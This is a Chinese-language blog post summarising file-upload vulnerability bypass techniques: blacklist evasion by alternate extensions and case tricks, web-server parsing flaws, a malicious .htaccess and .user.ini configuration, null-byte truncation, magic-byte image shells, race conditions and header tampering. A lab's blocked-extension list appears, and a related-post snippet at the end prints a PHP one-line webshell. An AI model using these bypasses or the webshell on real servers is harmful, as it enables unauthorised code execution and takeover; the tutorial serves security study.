文件上传漏洞总结:原理与利用技巧

已于 2023-09-27 17:52:23 修改
阅读量1k 收藏 1
点赞数
文章标签: php web安全 网络安全 安全
于 2023-06-03 23:10:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_51789211/article/details/131026869
版权

文章目录

文件上传漏洞总结:原理与利用技巧

一、形成原理

攻击者突破了服务端的限制成功上传了可执行的恶意脚本文件。(或是上传大量文件——DOS攻击)

二、绕过技巧

0x01.文件后缀拦截绕过

Ⅰ.前端验证

前端验证没有安全性可言

  • 在浏览器禁用JS
  • 在浏览器正常发包,用代理软件抓包并篡改
Ⅱ.黑名单验证

黑名单验证有一定的安全性,绕过的思路是利用解析漏洞(Ⅰ.利用后端验证代码存在的匹配缺陷(过滤不全)Ⅱ.利用中间件的解析漏洞)

A.利用服务端代码存在的匹配缺陷(过滤不全)
1. 可被脚本程序解析的其他后缀

​ php:(.phpar | .php3 | .php4 | .php5 | .phps等)

​ 其他参考某靶场的一个黑名单:

$deny_ext = array( ".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini"
);
2. 大小写绕过

.php => .Php.pHp

3. 双写绕过

.php => .phphpp

B.利用其他“组件”的漏洞
1.Apache
1.1. Apache解析漏洞

(从右往左识别,并跳过无法识别的后缀名)

webshell.php.abc.def => Apache解析 => webshell.php

1.2. 上传.htaccess来修改Apache的解析配置项

如上传这样的.htaccess文件:

<FilesMatch "webshell">
SetHandler application/x-httpd-php
</FilesMatch>
2.IIS
2.1.分号截断

webshell.php;xxx.jpg=>webshell.php(6.x)

2.2.斜杠绕过

webshell.jpg/1.php=>webshell.php(7.0、7.5)

3.Nignx
3.1.斜杠绕过

webshell.jpg/1.php=>webshell.php(<8.03)

4.Windows
4.1. 点绕过

.php => .php.

4.2. 空格绕过

后端验证代码未删除空格(从而绕过黑名单),而Windows在处理文件名时会把空格省略

.php => .php(空格)

4.3. ::$DATA绕过

Windows的NTFS会将文件名后带::$DATA的当作文件流处理,躲过验证并保留之前的文件名

.php => .php::$DATA

​ 那么文件名为“webshell”的文件都会被当作php脚本执行(这里的文件名不包含后缀,如webshell.jpgwebshell.png

Ⅲ.白名单验证

白名单一般有更好的安全性(不会漏掉过滤项),绕过思路是找服务端文件操作的逻辑漏洞或更底层的截断漏洞(C语言将0认为是程序语句结束的标志)

1. MIME-Type绕过、Content-Type绕过(可尝试大小写)

在BurpSuite中修改即可

2. %00绕过——GET

对于GET,在BurpSuite的Raw视图下,对请求行添加%00
在这里插入图片描述

3. 0x00绕过——POST

对于POST,则需要在BurpSuite的Hex视图下,修改对应的二进制数据

在这里插入图片描述

0x02.文件内容拦截绕过

1.对文件内容进行二进制验证(仅对文件头验证)

  • 在文件二进制内容的开头添加文件幻数

    • GIF:47 49 46 38 39 61(GIF89a)

    • JPG:FF D8 FF E0 10 4A 46 49 46

    • PNG:89 50 4E 47 0D 0A 1A 0A

2.进行二次渲染

对比经由服务器渲染前后的图片的二进制内容(用WinHex等),尝试把“仍然存活,未变化”的内容替换为一句话木马

3.先存再判断是否删除

条件竞争:多线程快速上传并访问一个能生成新webshell的脚本文件

4.多文件上传

在POST的body中写入多个文件数据,一个合法文件,第二个为非法内容

0x03.Ⅵ.其他

1. 制作图片马

在这里插入图片描述

2. 更多绕过Tips

1.多文件上传
在POST的body中写一个合法文件,再写一个webshell文件

2.上传`.user.ini`
除了上传`.htaccess`,还可以上传`.user.ini`来指定更多规则
如内容为`auto_prepend_file=webshell.jpg`,则表明php将自动包含解析`webshell.jpg`中的内容,可以配合图片马getshell

3.字符拼接
Content-Disposition: form-data; name="webShell"; filename="webshell.php"
=>
Content-Disposition: fo+rm-da+ta; name="webShell"; filename="webshell.php"

4.filename后添加空格
Content-Disposition: form-data; name="webShell"; filename="webshell.php"
=>
Content-Disposition: form-data; name="webShell"; filename ="webshell.php"
文件上传漏洞利用
m0_61506558的博客
10-09 1658
基于靶场的练习,决定把文件上传漏洞再进行总结,整体可以分为中间件解析漏洞、CMS漏洞、编辑器漏洞、CVE漏洞和其他,由于本人水平有限,如有问题,请师傅留言,一起进步!!!(一)基本介绍不理解漏洞原理的,可以看看下面文章哈文件上传漏洞__Cyber的博客-优快云博客_常见的文件上传漏洞(二)利用思路对文件上传类型进行区分,是属于编辑器文件上传,还是属于第三方应用,还是会员中心。要确保文件上传是什么类型,就用什么类型方法对它进行后期的测试。
文件上传漏洞利用利用
weixin_45178890的博客
08-01 1320
文件上传漏洞 可以上传一句话木马 PHP一句话木马如下 木马的连接密码是value <?php @eval($_POST[value]);?> 我们看到这个地方有一个上传点 然后我们上传一个php的脚本看能不能上传成功 然后我们看到没有上传成功被拦截了 看一下源代码是什么 function checkFile() { var file = document.getE...
文件上传漏洞原理利用(详细)
永不落的梦想
07-05 5112
本文包含文件上传漏洞原理利用和防御,绕过文件上传限制的各种姿势可以有效地利用文件上传漏洞,非常全面详细
文件上传漏洞,看这一篇文章就够了
weixin_46003602的博客
07-28 838
就是指用户上传了一个可执行的脚本文件,并通过脚本文件获得了执行服务器端命令的能力,出问题的地方在于怎么处理、解释文件,那么攻击方就要思考如何绕过检测和过滤。
常见文件上传漏洞利用
weixin_44414845的博客
12-14 4438
文件上传漏洞利用一、常见文件上传绕过方法1.javascript验证突破2.大小写突破3.服务器文件扩展名检测(不符合服务器端规定规则则不让上传)4.特殊后缀名绕过5.MIME类型6.文件内容检测7.图片马8.使用分布式配置9.文件截断10.编辑器漏洞1)ckfinder2)FCKeditor11.服务器解析漏洞1)apache解析漏洞未知后缀解析漏洞换行解析漏洞2)IIS6.0解析漏洞目录解析 ...
深入理解PHP文件包含漏洞原理利用防御
4. 部署恶意软件:将恶意文件上传到服务器,并通过文件包含漏洞执行。 PHP封装协议文件包含 在PHP中,文件包含函数不仅限于包含本地文件,还可以通过特定的封装协议访问远程资源,如`file://`、`http://`、`ftp:/...
掌握文件上传漏洞技巧:upload-labs靶场实战演练
攻击者通过利用文件上传功能的漏洞,可以上传恶意文件,从而获得服务器的控制权或者进行其他破坏行为。因此,理解和掌握文件上传漏洞原理和防御方法对于网络安全人员和开发人员来说是非常重要的。 "upload-labs-...
网络安全Web漏洞攻击实验:从信息收集到服务器控制的详细步骤技巧总结
最新发布
04-21
此外,还涉及了绕过JavaScript验证、利用文件上传漏洞等高级攻击手法。每个实验都详细描述了操作步骤、遇到的问题及解决方案,强调了实际操作中的关键点和注意事项。; 适合人群:对网络安全有兴趣的学习者,尤其是有...
LFI高级技巧:LFI文件上传.docxLFI高级技巧:LFI文件上传all.docxLFI高级技巧:LFI文件上传-(10).LFI文件上传的防御措施.docxLFI高级技巧:LFI
08-31
LFI高级技巧:LFI文件上传_(2).LFI漏洞原理利用方法.docx LFI高级技巧:LFI文件上传_(3).文件上传机制详解.docx LFI高级技巧:LFI文件上传_(4).文件上传漏洞利用技巧.docx LFI高级技巧:LFI文件上传...
文件上传漏洞原理实战技巧
资源摘要信息: "15文件上传漏洞原理实战.zip" 文件包详细讲解了在网络安全领域内,针对网络应用系统文件上传功能的安全漏洞原理和如何进行实战攻击检测的相关知识。文件上传漏洞Web应用中较为常见的一种安全问题...
文件上传原理
02-22
文件上传原理
文件上传漏洞原理利用
cangyu51462的博客
05-15 1429
文件上传漏洞原理利用
文件上传漏洞详解
KHOST的博客
09-09 929
文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。 网站上传文件并且存储的过程: 假如某网站有一个允许用户上传图片的功能,用户上传的图片最终会被存储到 /upload/ 目录下,并且以上传文件时的时间日期命名,上传文件的后缀为后缀。小明这时上传了一个1.jpg的文件,当服务器收到用户上传的数据时,会在 /upload...
WEB入门——文件上传漏洞
HasntStartIsOver的博客
06-04 1万+
文件上传漏洞服务端代码未对客户端上传的文件进行严格的验证,导致漏洞。如果.php后缀被限制,可以尝试:.php3、php4、.PHp(修改大小写)、.phtml、.pht等后缀,WebShell的内容一样。这两个配置的意思就是:我们指定一个文件,那么该文件就会被包含在要执行的php文件中(如index.php)。如果客户端JS脚本有加限制(例如上传图片,JS脚本显示了只能上传图片格式,不能上传.php后缀的文件)。1、上传的文件是web脚本语言,服务器的web容器解释并执行了用户上传的脚本,脚本语言执行。
文件上传漏洞利用介绍
热门推荐
星落的博客
06-05 1万+
绕过js验证 js验证代码分析 burpsuit剔除js验证 对于js前端验证,直接删除js代码之后就可以绕过js验证 绕过MIME-TYPE验证 验证MEMI-TYPE代码分析 查看源代码分析,使用$_FILE["upload_file"]["type"]获取上传文件的MIME-TYPE类型。其中upload_file是在表单中定义的。 burpsuit绕过MIME-TYPE验证 利用burpsuit工具截断http请求,在repeater重放修改MIME-TYPE类型绕过验证
java文件上传原理
keepeye的专栏
05-20 7659
  网页表单是一个web基础设施,提供了交互接口,作为使用web技术的开发人员,了解其工作原理,是必须的功课,本文描述表单域和二进制数据一同传输并被处理.   有关表单资料,若需要可参考http://www.htmlhelp.com/reference/html40/forms/form.html.   在表单元素中 enctype 属性指定了传递给服务器的表单数据集编码的内容类型,它的默认值是“
文件上传漏洞利用方式
Bulldozer_GD的博客
08-13 1332
此文主要讲的就是文件上传限制绕过方法,文件上传限制绕过方法有以下三种: 解析漏洞Windows下 空格 和 . 绕过%00截断 一、IIS6.0的解析漏洞 触发条件:必须是IIS6.0的环境 文件名漏洞 正常命名:as.jpg 触发漏洞的命名方式:as.asp;.jpg http://192.168.16.128/as.jpg 打开是一张正常的图片。 http://192.168.16.128/as.asp;.jpg 打开已经被解析成asp的源码了。 文件夹名漏洞 正常命名:a/as.jpg 触发解析漏洞
一文爽 文件上传漏洞原理、方法和类型详细解析
MachineGunJoe666
05-23 3201
文件上传漏洞web系统中常见的一种功能,通过文件上传能实现上传图片、视频,以及其他类型的文件,但是随着web中包含的功能越来越多,潜在的网络安全风险也就越大。如果恶意用户上传了可执行的文件或者脚本,就会导致网站被其控制甚至会使其服务器沦陷,以至于引发恶意的网络安全事件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Neonline

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值